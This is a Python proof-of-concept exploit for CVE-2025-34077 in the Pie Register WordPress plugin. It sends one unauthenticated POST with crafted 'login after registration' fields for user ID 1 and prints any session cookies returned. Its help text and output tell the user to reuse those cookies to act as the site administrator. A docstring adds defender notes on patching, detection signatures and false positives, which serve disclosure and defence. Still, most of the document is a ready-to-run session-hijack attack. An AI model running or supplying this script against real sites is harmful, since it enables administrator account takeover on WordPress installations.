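#!/usr/bin/env python3
"""Proof-of-concept check for CVE-2025-34077 (Pie Register WordPress plugin).

The script sends one unauthenticated POST to the site root carrying the
plugin's "login after registration" form fields and reports whether the
response sets any cookies. Per the help text below, Pie Register releases
<= 3.7.1.4 are affected.

Notes for defenders:

* Remediation: run a Pie Register release newer than 3.7.1.4. If exposure is
  suspected, invalidate existing sessions (for example by rotating the
  WordPress secret keys/salts) so that cookies issued earlier stop working.
* Detection: look for unauthenticated POST requests whose body contains
  ``social_site=true`` together with ``user_id_social_site`` and
  ``piereg_login_after_registration``. Request bodies are usually absent from
  plain access logs, so this needs WAF or request-body logging. The
  User-Agent sent here is a fixed string and is a weak indicator on its own.
* The result is a heuristic: any cookie in the response counts as a hit, so
  a patched site that sets an unrelated cookie is reported as vulnerable.
* Cookie values printed on a hit are live credentials; treat the output
  (terminal scrollback, CI logs) as secret material.
"""
import requests
import sys
from bs4 import BeautifulSoup  # not used below; kept from the original listing

# Start-up banner. Row breaks restored; the inner spacing is as found on the page.
BANNER = r"""
 _______ ________ ___ ___ ___ _____ ____ _ _ ___ ______ ______
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |___ \| || | / _ \____ |____ |
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ __) | || |_| | | | / / / /
| | \ \/ / | __| |______| / /| | | |/ /|___ \ |______| |__ <|__ _| | | | / / / /
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | | | | |_| |/ / / /
 \_____| \/ |______| |____|\___/____|____/ |____/ |_| \___//_/ /_/
by Mrj Haxcore | CVE-2025-34077
"""

# The usage line names the required positional argument; main() reads it
# from sys.argv[1] and prints this text when it is missing.
HELP = """
Usage: python3 pie.py TARGET_URL

Description:
This script exploits an unauthenticated admin session hijack vulnerability in the Pie Register WordPress plugin <= 3.7.1.4 to steal admin cookies.

Options:
-h, --help Show this help message and exit
"""

# Upper bound, in seconds, on how long the single HTTP request may take.
# Without it requests waits indefinitely on an unresponsive host.
REQUEST_TIMEOUT_SECONDS = 15


def main():
    """Send the probe request to the target given on the command line.

    Reads the base URL from ``sys.argv[1]``. Prints the help text and exits
    with status 0 when the argument is missing or is ``-h``/``--help``.
    Exits with status 1 when the HTTP request fails (connection error,
    timeout, malformed URL). Otherwise prints either the cookies the
    response set or the response status and headers.
    """
    print(BANNER)

    if len(sys.argv) < 2 or sys.argv[1] in ['-h', '--help']:
        print(HELP)
        sys.exit(0)

    # Normalise the base URL so exactly one trailing slash is sent.
    target = sys.argv[1].rstrip('/')
    login_url = f"{target}/"

    # Fixed, self-identifying User-Agent; it makes this exact script easy to
    # spot in web server logs.
    headers = {
        "User-Agent": "Mozilla/5.0 (PoC Exploit for CVE-2025-34077)"
    }

    # Form fields of the plugin's post-registration login flow. The request
    # carries no credentials: "log" and "pwd" are the literal string "null".
    data = {
        "user_id_social_site": "1",  # Admin ID (user id 1; presumably the first account created)
        "social_site": "true",
        "piereg_login_after_registration": "true",
        "_wp_http_referer": "/login/",
        "log": "null",
        "pwd": "null"
    }

    print("[*] Sending payload to hijack admin session...")
    try:
        # Redirects are not followed so that the cookies set by the first
        # response are the ones inspected below.
        resp = requests.post(
            login_url,
            data=data,
            headers=headers,
            allow_redirects=False,
            timeout=REQUEST_TIMEOUT_SECONDS,
        )
    except requests.exceptions.RequestException as e:
        # Covers timeouts, connection failures and URLs without a scheme.
        print(f"[!] Request failed: {e}")
        sys.exit(1)

    cookies = resp.cookies.get_dict()
    # NOTE(review): any cookie at all is treated as success. A patched site
    # that sets an unrelated cookie is reported as vulnerable; confirm a hit
    # by checking the installed plugin version.
    if cookies:
        print("\n[+] Successfully hijacked cookies for user_id=1 (admin):")
        for k, v in cookies.items():
            print(f" {k} = {v}")
        print("\n[!] Use these cookies in your browser or tools like curl or Burp to act as admin.")
    else:
        print("[-] Failed to get any cookies. Target may be patched or not vulnerable.")
        print(f"[i] HTTP Status: {resp.status_code}")
        print(f"[i] Response Headers: {resp.headers}")


if __name__ == "__main__":
    main()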